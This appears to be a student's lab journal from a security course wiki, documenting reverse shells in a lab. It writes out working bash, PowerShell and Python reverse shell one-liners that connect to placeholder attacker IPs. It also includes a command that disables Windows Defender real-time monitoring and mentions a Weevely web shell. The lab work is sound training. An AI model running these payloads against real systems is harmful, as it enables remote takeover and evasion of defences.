Lab 8.2 ‐ Reverse Shells ‐ JM - Jacob-Mayotte/SEC335_Tech_Journal GitHub Wiki

Traffic Analysis of bash reverse shell

Deliverable 1:Bash Reverse Shell on Linux
  • Connected to SEC335 rocky w/ cyber.local creds.
  • Hosted nc listener on port 4449: nc -nlvp 4449 on personal kali box
  • THen on SEC335-rocky I used a native bash reverse shell that was provided to connect to the nc listener. Command:

/bin/bash -i >& /dev/tcp/x.x.x.x/4449 0>&1 // replace x.x.x.x with kali's eth0 dhcp addr

  • I could then interact with sec335 rocky via the nc session hosted on my kali box

To fulfill the deliverable I ran a wirehark scan via kali vm on eth0 then followed the TCP stream with the correct ip addresses.

Deliverable 2: Test on Pippen
  • Elevatted the Weevely php script that was bult in the last lab:

image

Deliverable 3: PowerShell Reverse shells:

  • Disable defender on windows host: Set-MpPreference -DisableRealtimeMonitoring $true

  • I then connected to my kali box via remote chrome desktop through the winows machine

  • On the Kali VM I hosted a nc listener

  • Then I used an elevated command prompt to run: powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Deliverable 4: Python3 reverse shell on rocky:

image

Command used: python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",4449));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' // Replace: Kali-IP w kali vm IP

Source

Reflection/Sources:

This lab was probably one of the most of the semester! It was really informative to understand how someone remotely can execute commands remotely via a reverse shell. It was nice to see the different perspective with the WireShark captures (even in lab 8.1). This seems like a nice tool for threat actors but it as well seems to be easily detectable.